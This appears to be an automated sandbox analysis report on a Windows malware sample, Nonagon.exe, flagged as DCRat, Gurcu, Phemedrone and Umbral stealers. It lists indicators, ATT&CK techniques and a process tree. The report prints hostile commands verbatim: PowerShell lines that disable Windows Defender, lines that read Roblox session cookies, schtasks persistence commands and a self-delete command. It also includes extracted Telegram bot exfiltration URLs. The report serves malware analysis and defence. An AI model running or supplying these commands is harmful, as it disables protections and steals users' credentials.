dcrat | f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nonagon.exe
Size

23KB
MD5

1b554731ea6b94e44ab6fe7ec45eb153
SHA1

1849707450548f79b4f8d941745c2c72199a7f00
SHA256

f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70
SHA512

96880df0242f41380e2877a3cac119e14ab062c4892040a3d8c9fe5fbc58ee6681729d1a1ca5c62427d4ad5ca76be1167d8811e9b4c35656e0c1000d660c06c1
SSDEEP

384:LD5Ry1Yg5MsZHalPXhZAiWGVDNr2mtbQ2E65wMxsWSjRSiKM3EMtR:zymgSCh2Ey/GWSjRSiKM3Nt

Score

10^/10

dcrat gurcu phemedrone umbral credential_access discovery execution infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocument

Extracted

Family

gurcu

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocumen

Signatures

DcRat 12 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		1568	schtasks.exe
		2464	schtasks.exe
		4836	schtasks.exe
File created	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat		RarExtPackage.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root		Nonagon.exe
		3064	schtasks.exe
		3320	schtasks.exe
		4808	schtasks.exe
		2884	schtasks.exe
		4924	schtasks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Nvidia = "C:\\Program Files\\WinRAR\\RarExtPackage.exe"		Nonagon.exe
		2396	schtasks.exe

Dcrat family
dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023cb7-36.dat	family_umbral
behavioral2/memory/2200-53-0x000001E2E7FF0000-0x000001E2E8030000-memory.dmp	family_umbral

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone

Process spawned unexpected child process 9 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2464	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2396	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3064	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3320	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	4980	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	4980	schtasks.exe	89

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023cb2-19.dat	dcrat
behavioral2/files/0x0007000000023cb5-156.dat	dcrat
behavioral2/memory/1128-158-0x0000000000D10000-0x0000000000E02000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2888	powershell.exe
2156	powershell.exe
1228	powershell.exe
1560	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wtf1.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	RarExtPackage.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	DebugTracker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	lsass.exe

Executes dropped EXE 6 IoCs

pid	Process
4972	RarExtPackage.exe
2200	wtf1.exe
916	wtf.exe
1952	cs2.exe
1128	DebugTracker.exe
404	lsass.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
43	discord.com
45	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Nvidia = "C:\\Program Files\\WinRAR\\RarExtPackage.exe"	Nonagon.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\skins\DebugTracker.exe	DebugTracker.exe
File created	C:\Program Files\VideoLAN\VLC\skins\baf0f489ef151f	DebugTracker.exe
File created	C:\Program Files\WinRAR\RarExtPackage.exe	Nonagon.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\6203df4a6bafc7	DebugTracker.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\debug\wtf1.exe	attrib.exe
File created	C:\Windows\debug\__tmp_rar_sfx_access_check_240631609	RarExtPackage.exe
File opened for modification	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File created	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe
File created	C:\Windows\debug\wtf.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File opened for modification	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe
File created	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File created	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File created	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File created	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf.exe	RarExtPackage.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RarExtPackage.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1612	cmd.exe
3788	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1596	wmic.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	RarExtPackage.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	DebugTracker.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	lsass.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3788	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1568	schtasks.exe
2464	schtasks.exe
2396	schtasks.exe
3064	schtasks.exe
4924	schtasks.exe
4836	schtasks.exe
3320	schtasks.exe
4808	schtasks.exe
2884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
1952	cs2.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
916	wtf.exe
2200	wtf1.exe
2888	powershell.exe
2888	powershell.exe
1560	powershell.exe
1560	powershell.exe
2156	powershell.exe
2156	powershell.exe
2304	powershell.exe
2304	powershell.exe
1228	powershell.exe
1228	powershell.exe
1128	DebugTracker.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe
404	lsass.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
404	lsass.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	916	wtf.exe
Token: SeDebugPrivilege	2200	wtf1.exe
Token: SeDebugPrivilege	1952	cs2.exe
Token: SeIncreaseQuotaPrivilege	1568	wmic.exe
Token: SeSecurityPrivilege	1568	wmic.exe
Token: SeTakeOwnershipPrivilege	1568	wmic.exe
Token: SeLoadDriverPrivilege	1568	wmic.exe
Token: SeSystemProfilePrivilege	1568	wmic.exe
Token: SeSystemtimePrivilege	1568	wmic.exe
Token: SeProfSingleProcessPrivilege	1568	wmic.exe
Token: SeIncBasePriorityPrivilege	1568	wmic.exe
Token: SeCreatePagefilePrivilege	1568	wmic.exe
Token: SeBackupPrivilege	1568	wmic.exe
Token: SeRestorePrivilege	1568	wmic.exe
Token: SeShutdownPrivilege	1568	wmic.exe
Token: SeDebugPrivilege	1568	wmic.exe
Token: SeSystemEnvironmentPrivilege	1568	wmic.exe
Token: SeRemoteShutdownPrivilege	1568	wmic.exe
Token: SeUndockPrivilege	1568	wmic.exe
Token: SeManageVolumePrivilege	1568	wmic.exe
Token: 33	1568	wmic.exe
Token: 34	1568	wmic.exe
Token: 35	1568	wmic.exe
Token: 36	1568	wmic.exe
Token: SeIncreaseQuotaPrivilege	1568	wmic.exe
Token: SeSecurityPrivilege	1568	wmic.exe
Token: SeTakeOwnershipPrivilege	1568	wmic.exe
Token: SeLoadDriverPrivilege	1568	wmic.exe
Token: SeSystemProfilePrivilege	1568	wmic.exe
Token: SeSystemtimePrivilege	1568	wmic.exe
Token: SeProfSingleProcessPrivilege	1568	wmic.exe
Token: SeIncBasePriorityPrivilege	1568	wmic.exe
Token: SeCreatePagefilePrivilege	1568	wmic.exe
Token: SeBackupPrivilege	1568	wmic.exe
Token: SeRestorePrivilege	1568	wmic.exe
Token: SeShutdownPrivilege	1568	wmic.exe
Token: SeDebugPrivilege	1568	wmic.exe
Token: SeSystemEnvironmentPrivilege	1568	wmic.exe
Token: SeRemoteShutdownPrivilege	1568	wmic.exe
Token: SeUndockPrivilege	1568	wmic.exe
Token: SeManageVolumePrivilege	1568	wmic.exe
Token: 33	1568	wmic.exe
Token: 34	1568	wmic.exe
Token: 35	1568	wmic.exe
Token: 36	1568	wmic.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeIncreaseQuotaPrivilege	2196	wmic.exe
Token: SeSecurityPrivilege	2196	wmic.exe
Token: SeTakeOwnershipPrivilege	2196	wmic.exe
Token: SeLoadDriverPrivilege	2196	wmic.exe
Token: SeSystemProfilePrivilege	2196	wmic.exe
Token: SeSystemtimePrivilege	2196	wmic.exe
Token: SeProfSingleProcessPrivilege	2196	wmic.exe
Token: SeIncBasePriorityPrivilege	2196	wmic.exe
Token: SeCreatePagefilePrivilege	2196	wmic.exe
Token: SeBackupPrivilege	2196	wmic.exe
Token: SeRestorePrivilege	2196	wmic.exe
Token: SeShutdownPrivilege	2196	wmic.exe
Token: SeDebugPrivilege	2196	wmic.exe
Token: SeSystemEnvironmentPrivilege	2196	wmic.exe
Token: SeRemoteShutdownPrivilege	2196	wmic.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 4400 wrote to memory of 4972	4400	Nonagon.exe	83
PID 4400 wrote to memory of 4972	4400	Nonagon.exe	83
PID 4400 wrote to memory of 4972	4400	Nonagon.exe	83
PID 4972 wrote to memory of 2184	4972	RarExtPackage.exe	84
PID 4972 wrote to memory of 2184	4972	RarExtPackage.exe	84
PID 4972 wrote to memory of 2184	4972	RarExtPackage.exe	84
PID 4972 wrote to memory of 2200	4972	RarExtPackage.exe	85
PID 4972 wrote to memory of 2200	4972	RarExtPackage.exe	85
PID 4972 wrote to memory of 916	4972	RarExtPackage.exe	87
PID 4972 wrote to memory of 916	4972	RarExtPackage.exe	87
PID 4972 wrote to memory of 1952	4972	RarExtPackage.exe	88
PID 4972 wrote to memory of 1952	4972	RarExtPackage.exe	88
PID 2200 wrote to memory of 1568	2200	wtf1.exe	93
PID 2200 wrote to memory of 1568	2200	wtf1.exe	93
PID 2200 wrote to memory of 4440	2200	wtf1.exe	95
PID 2200 wrote to memory of 4440	2200	wtf1.exe	95
PID 2200 wrote to memory of 2888	2200	wtf1.exe	97
PID 2200 wrote to memory of 2888	2200	wtf1.exe	97
PID 2200 wrote to memory of 1560	2200	wtf1.exe	99
PID 2200 wrote to memory of 1560	2200	wtf1.exe	99
PID 2200 wrote to memory of 2156	2200	wtf1.exe	101
PID 2200 wrote to memory of 2156	2200	wtf1.exe	101
PID 2200 wrote to memory of 2304	2200	wtf1.exe	103
PID 2200 wrote to memory of 2304	2200	wtf1.exe	103
PID 2200 wrote to memory of 2196	2200	wtf1.exe	107
PID 2200 wrote to memory of 2196	2200	wtf1.exe	107
PID 2200 wrote to memory of 5096	2200	wtf1.exe	109
PID 2200 wrote to memory of 5096	2200	wtf1.exe	109
PID 2200 wrote to memory of 3520	2200	wtf1.exe	111
PID 2200 wrote to memory of 3520	2200	wtf1.exe	111
PID 2200 wrote to memory of 1228	2200	wtf1.exe	113
PID 2200 wrote to memory of 1228	2200	wtf1.exe	113
PID 2200 wrote to memory of 1596	2200	wtf1.exe	115
PID 2200 wrote to memory of 1596	2200	wtf1.exe	115
PID 2200 wrote to memory of 1612	2200	wtf1.exe	118
PID 2200 wrote to memory of 1612	2200	wtf1.exe	118
PID 1612 wrote to memory of 3788	1612	cmd.exe	120
PID 1612 wrote to memory of 3788	1612	cmd.exe	120
PID 2184 wrote to memory of 884	2184	WScript.exe	125
PID 2184 wrote to memory of 884	2184	WScript.exe	125
PID 2184 wrote to memory of 884	2184	WScript.exe	125
PID 884 wrote to memory of 1128	884	cmd.exe	128
PID 884 wrote to memory of 1128	884	cmd.exe	128
PID 1128 wrote to memory of 4944	1128	DebugTracker.exe	138
PID 1128 wrote to memory of 4944	1128	DebugTracker.exe	138
PID 4944 wrote to memory of 2388	4944	cmd.exe	140
PID 4944 wrote to memory of 2388	4944	cmd.exe	140
PID 4944 wrote to memory of 404	4944	cmd.exe	141
PID 4944 wrote to memory of 404	4944	cmd.exe	141
PID 404 wrote to memory of 2256	404	lsass.exe	142
PID 404 wrote to memory of 2256	404	lsass.exe	142
PID 404 wrote to memory of 2212	404	lsass.exe	143
PID 404 wrote to memory of 2212	404	lsass.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4440	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nonagon.exe
"C:\Users\Admin\AppData\Local\Temp\Nonagon.exe"
1⤵
- DcRat
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4400
- C:\Program Files\WinRAR\RarExtPackage.exe
  "C:\Program Files\WinRAR\RarExtPackage.exe"
  2⤵
  - DcRat
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\debug\VUQLBafFd1oU7p3k.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:884
    - - C:\Windows\debug\DebugTracker.exe
        
        "C:\Windows\debug\DebugTracker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k7obWzcPp6.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4944
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:2388
        
        C:\Users\All Users\Oracle\Java\lsass.exe
        
        "C:\Users\All Users\Oracle\Java\lsass.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of WriteProcessMemory
        
        PID:404
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\53d50e90-9250-43bd-866d-a879cc7c0057.vbs"
        8⤵
        
        PID:2256
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b4fd42aa-1667-4647-83fa-91b27908354c.vbs"
        8⤵
        
        PID:2212
- - C:\Windows\debug\wtf1.exe
    "C:\Windows\debug\wtf1.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1568
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Windows\debug\wtf1.exe"
      4⤵
      Drops file in Windows directory
      Views/modifies file attributes
      PID:4440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\debug\wtf1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2304
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2196
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:5096
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:3520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1228
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1596
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\debug\wtf1.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:1612
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3788
- - C:\Windows\debug\wtf.exe
    "C:\Windows\debug\wtf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:916
- - C:\Windows\debug\cs2.exe
    "C:\Windows\debug\cs2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Oracle\Java\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Oracle\Java\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Oracle\Java\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DebugTrackerD" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\VLC\skins\DebugTracker.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DebugTracker" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\skins\DebugTracker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DebugTrackerD" /sc MINUTE /mo 10 /tr "'C:\Program Files\VideoLAN\VLC\skins\DebugTracker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WinRAR\RarExtPackage.exe

Filesize
1.5MB

MD5
84d934c68349e798f58a35df1f2f90c2

SHA1
be0974e4699ff06f52f0d5d380bc9cb8f0c50e19

SHA256
3b7218b64c14fc5125a93b4f898886d3bb9c1bb69f0696ae557bb2b79fe8e8f6

SHA512
83ea4479e8536b015a628c0a8ca0662b269875f303bd0193ad551022c04105406001990f3b261c8201ec031d92047450debe1c915a2e361eddb80b48b876d335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1a58f982c18490e622e00d4eb75ace5a

SHA1
60c30527b74659ecf09089a5a7c02a1df9a71b65

SHA256
4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

SHA512
ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b99cf5ed5b7681da55ae0ba785e24c19

SHA1
29013d5f4f8d0a3cc6545fd2b88a72cd376a1366

SHA256
136cf0f4113cf7a0323f17ab2061065f8a15a00359574d7cab3b28d0ea52f4b2

SHA512
d8d4a347081ef49256e09769985dc2f1f5f3b241e918c832e14adad30cba3ca0bf4bfcab28007137509334afaf65df4485366bf2825ad2750be88621f90e32f0

